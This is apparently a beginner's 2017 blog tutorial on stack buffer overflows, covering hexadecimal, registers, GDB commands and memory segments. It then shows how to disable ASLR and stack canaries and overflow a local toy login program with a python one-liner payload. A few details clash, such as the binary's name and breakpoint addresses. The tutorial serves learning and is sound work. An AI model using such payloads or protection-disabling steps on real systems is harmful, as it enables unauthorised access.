10 de jul de 2017

Exploring the Buffer

* Warning: My english sux. 
"Computers, in a slightly schizoid fashion, work in base 2 and base 16 - all the same time." - Jeff Duntemann
The natural way to find any program vulnerability is disassembling it so we need to know this weird base 16 number system also some assembly. If you don't have any knowledge about it you can keep reading otherwise just skip this intro. 

Basic of Hexadecimal:
Base 16 or Hexadecimal number system has 16 digits so 6 additional digits are added in the form of A-F. This makes hex extremely useful for representing binary data. One digit of hex is equal to one nibble or 4 bits of data. Two hex digits are equal to a byte or 8 bits. Four hex digits are equal to a 32 bit word. Eight hex digits are equal to a 64 bit word. You can see from the following chart of counting with hexadecimal(HEX) decimal(DEC) and binary(BINARY) values what is going on:

----  ----  ----------   ----  ----  ----------   ---- ----  ----------
0x00  (00)  (00000000)   0x10  (16)  (00010000)   0x20 (32)  (00100000)
0x01  (01)  (00000001)   0x11  (17)  (00010001)   0x21 (33)  (00100001)
0x02  (02)  (00000010)   0x12  (18)  (00010010)   0x22 (34)  (00100010)
0x03  (03)  (00000011)   0x13  (19)  (00010011)   0x23 (35)  (00100011)
0x04  (04)  (00000100)   0x14  (20)  (00010100)   0x24 (36)  (00100100)
0x05  (05)  (00000101)   0x15  (21)  (00010101)   0x25 (37)  (00100101)
0x06  (06)  (00000110)   0x16  (22)  (00010110)   0x26 (38)  (00100110)
0x07  (07)  (00000111)   0x17  (23)  (00010111)   0x27 (39)  (00100111)
0x08  (08)  (00001000)   0x18  (24)  (00011000)   0x28 (40)  (00101000)
0x09  (09)  (00001001)   0x19  (25)  (00011001)   0x29 (41)  (00101001)
0x0A  (10)  (00001010)   0x1A  (26)  (00011010)   0x2A (42)  (00101010)
0x0B  (11)  (00001011)   0x1B  (27)  (00011011)   0x2B (43)  (00101011)
0x0C  (12)  (00001100)   0x1C  (28)  (00011100)   0x2C (44)  (00101100)
0x0D  (13)  (00001101)   0x1D  (29)  (00011101)   0x2D (45)  (00101101)
0x0E  (14)  (00001110)   0x1E  (30)  (00011110)   0x2E (46)  (00101110)
0x0F  (15)  (00001111)   0x1F  (31)  (00011111)   0x2F (47)  (00101111)

For a byte this chart would continue until it reached 0xFF  (255) (1111 1111) 255 is the largest number that can be represented with a byte.

Memory and Registers:
A memory is a collection of bytes each one having their own addresses. A 64-bit machine have 2⁶⁴ addresses but each architecture have it's own machine language and different types of assembly. The 2 mains assembly syntax are: AT&T and Intel. The processor registers are a special kind of variable, we can use the debuggers (as GDB) to see the computer memory and registers, step by step.

General purpose registers: 
They act as temporary variables required by the program. We have the following general purpose registers: EAX (accumulator), EBX (base), ECX (counter), EDX (data), ESI (source index), EDI (destination index), ESP (stack pointer), EBP (base pointer). The most important register for exploits is the Instruction Pointer Register, called IP (16 bit), EIP (32 bit) or RIP (64 bit).

Some assembly operations:
mov:  move the value from source to destination.
sub:  subtraction.
inc:  increases.
cmp:  compare values.
j:    jump to one different part of the code.
jle:  jump if less than equal to. (as if/then/else)
call: puts the return location onto the stack and then jumps to a function.
ret:  pops the return address off the stack at the end of the function and jumps there. Is the address stored in the instruction pointer to continue the execution when the function has completed.

GDB useful commands: 
(gdb) break main        set a breakpoint on main function
(gdb) run               run the program with current arguments
(gdb) x/x $rip          print $rip in hex
(gdb) x/o $rip display $rip in octal
(gdb) x/u $rip unsigned (base 10)
(gdb) x/t $rip display in binary
(gdb) x/i $rip display the disassembled memory
(gdb) x/10i main        disassemble first 10 instructions in main
(gdb) x/3xw disassemble first 3 memory addresses
(gdb) disas main        dissassemble code for main
(gdb) bt         print stack backtrace
(gdb) c                 continue the program

C Memory Segmentation:
The memory of a compiled program is divided into 5 segments:
1. Text: contains the assembly instructions. Marked as read-only with a fixed lenght.
2. Data: contains the local and global variables, also have a fixed length.
3. Bss: contains uninitialized global variables
4. Heap: contains the dynamic memory, requested via C's malloc(). Don't have a fixed lenght, growing upward.
5. Stack: is a collection of stack frames, used as temporary storage. As LIFO (first in, last out) the first item placed in a stack is the last one leaving it, growing downward and is where the backtrace of gdb looks at.
The C compiler needs to know the variable type or it's memory address. The memory is divided into segments if the program don't give enough arguments it tries to access an address outside the limit, resulting the famous 'segmentation fault'. Usually these unexpected errors break the program but exploits can control the execution of the program avoiding errors and reprogramming the process.

An exploit uses the program vulnerability to get the control of the running code or system, allowing privilege escalation and other attacks. It is a way to make a program do whatever you like, even if the original program was written to do other things. Many exploits explore the memory corruption, including common techniques such as buffer overflows. The buffer overflow as the name says is overloading data into the buffer. The most common buffer in C is an array. 

First BoF:
To run our vulnerable code, first we need to disable the defense feature to prevent exploitation of memory corruption vulnerabilities called The Address Space Layout Randomization (ASLR). 
To disable it, run: $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable again, you can run: $ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
You can see your randomized memory address with this code:
#include <stdio.h>
void main() {
        register int i asm("esp");
        printf("$esp = %#010x\n", i);
The register variable ask the compiler to use a CPU register, instead of RAM. The asm keyword enable you to see the current stack pointer (esp), displaying the address in hexadecimal. Running it we get:
$ gcc esp.c 
$ ./a.out 
esp = 0x07fa7750
$ ./a.out 
esp = 0x7fb76d60
After disabling the ASLR we get only 1 fixed address:
$ ./a.out 
esp = 0xffffdda0

Disassembling with GDB:
To run our bof.c we need to disable the canaries:
$ gcc bof.c -o bof -fno-stack-protector
$ gdb ./bof
(gdb) run 0x231da6e1
Starting program: /home/zeldani/hacking/bof 0x231da6e1
Access Denied.
(gdb) disas login
   0x0000000000400587 <+33>: callq  0x400430 <strcpy@plt>
   0x000000000040058c <+38>: cmpl   $0x231da6e1,-0x4(%rbp)
   0x0000000000400593 <+45>: jne    0x4005a8 <login+66>
   0x0000000000400595 <+47>: mov    $0x400674,%edi
   0x000000000040059a <+52>: callq  0x400440 <puts@plt>
   0x000000000040059f <+57>: movl   $0x1,-0x4(%rbp)
   0x00000000004005a6 <+64>: jmp    0x4005b2 <login+76>
   0x00000000004005a8 <+66>: mov    $0x400680,%edi
   0x00000000004005ad <+71>: callq  0x400440 <puts@plt>
   0x00000000004005b2 <+76>: nop
   0x00000000004005b3 <+77>: leaveq 
   0x00000000004005b4 <+78>: retq   
End of assembler dump.

Let's break at callq, compl  and retq instructions to see what is happening:
(gdb) break *0x0000000000400587
(gdb) break *0x000000000040058c
(gdb) break *0x000000000040059a
(gdb) break *0x00000000004005ad
(gdb) break *0x00000000004005b4

(gdb) run 0x231da6e1
Starting program: /home/zeldani/hacking/bof 0x231da6e1
Breakpoint 1, 0x00000000004005d7 in login ()
(gdb) i r
rax            0x7fffffffdd00 140737488346368
rbx            0x0   0
rcx            0x0   0
rdx            0x7fffffffe217 140737488347671
rsi            0x7fffffffe217 140737488347671
rdi            0x7fffffffdd00 140737488346368
rbp            0x7fffffffdd20 0x7fffffffdd20
rsp            0x7fffffffdcf0 0x7fffffffdcf0

Subtracting the variable 0x231da6e1 located at rbp with the register rax we get the bytes required by the buffer:
$ echo 'ibase=16;7FFFFFFFDD20-7FFFFFFFDD00' | bc 
Now that we know the buffer size we can try to overflow it using 'a's as payload and change the value 0x231da6e1 to little endian format where the least significant byte is stored first, so the bytes are reversed in order:
$ ./bo3 $(python -c "print 'a'*28+'\xe1\xa6\x1d\x23'")
Welcome! :)

It works! The buffer array was overflowed into the variable 0x231da6e1, changing the bytes to 0x41 ('a' in hex). We got the execution control of the variable making the if statement overwrite the password, since it consider any nonzero value.
* Thank you my sis EMPixie for sharing your knowledge about exploits and for writing about hexadecimal. <3

* References:
Hacking the art of Exploitation

0 comentários:

Postar um comentário